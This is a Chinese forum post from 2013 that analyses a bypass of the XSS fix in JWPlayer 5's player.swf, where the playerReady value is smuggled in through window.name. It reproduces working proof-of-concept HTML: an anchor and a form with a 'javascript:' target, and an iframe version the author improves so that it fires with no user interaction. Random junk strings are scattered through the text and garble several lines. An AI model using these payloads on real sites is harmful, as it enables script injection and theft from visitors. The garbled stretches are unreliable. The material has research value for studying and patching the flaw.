找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2915|回复: 0
打印 上一主题 下一主题

JWPlayer 5最新SWF XSS 0day分析及POC改进

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:03:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
原文:http://pnigos.com/?p=71
' g; m, g/ d1 J+ W8 e特别Thx 小雄同学的idea
) K2 z( g3 n5 s0 ^1 ?" _/ i0 A

老外在16号公布了jwplayer一个未修复的XSS 0day,详情猛戳这里。jwplayer是全球范围内目前应用最广泛的flash播放组件,特别是国外众多在线爱情动作片网站。此前jwplayer曾爆出过一个XSS漏洞,影响非常广泛。

根据老外的描述,这次的问题主要是因为之前一个XSS漏洞没有修复完全,导致bypass再利用。原始的问题是playerReady参数值未做过滤直接进入ExternalInterface.call导致可以执行任意JS代码。在经过官方的两次小版本补丁后,这个问题最终的修复方案是禁止playerReady参数值中存在{}和()符号。而这种简单的修复是可以被绕过的。

原文给出的POC:

<h2>Example 1:</h2> <p>This example simply uses javascript:alert(1) as the value in window.name</p> <p><a target="javascript:alert(1)" href="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b">Click Me</a></p>3 \0 [8 j# K" ?: R# w. H/ P2 o  h4 ?
http://www.myhack58.com/Article/UploadPic/2013-4/201341714920664.jpg. i0 e, l$ z9 L* L9 b! b

这里用到了两个特性,一个是a标签target的framename,一个是window.name的跨域传递的特性。在a标签等其他可以使用的target属性的标签中我们常用的是_blank,_parent,_self,_top四个值,而framename我们很少用到。framename相当于指定一个窗口的名称并将文档重定向到该窗口中进行处理,因此framename就相当于window.name,这个POC在a标签中用javascript:alert(1)伪协议作为了framename,漏洞URL指定location为window.name也就执行了我们的JS代码。我们同样可以用form等其他支持target属性的标签来构造poc:


& }4 S0 x& {1 v: p5 b0 B$ ?<form action="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b" method="post" target="javascript:alert(1)"> <button type="submit">登录</button> </form>

但这种POC是需要交互的,就比较鸡肋了,其实我们可以改进成不需要用户交互的形式。既然framename是窗口的名称,那我们可以直接使用iframe并指定name为javascript:alert(1)。

<iframe name="javascript:alert(document.domain)" src="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b"> </iframe
1 Q8 c" D  t/ O4 V9 K' Y/ J0 nhttp://www.myhack58.com/Article/UploadPic/2013-4/201341714922835.jpg
% T- Z  s$ B2 |& |8 |这样我们的POC就可以自动触发了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表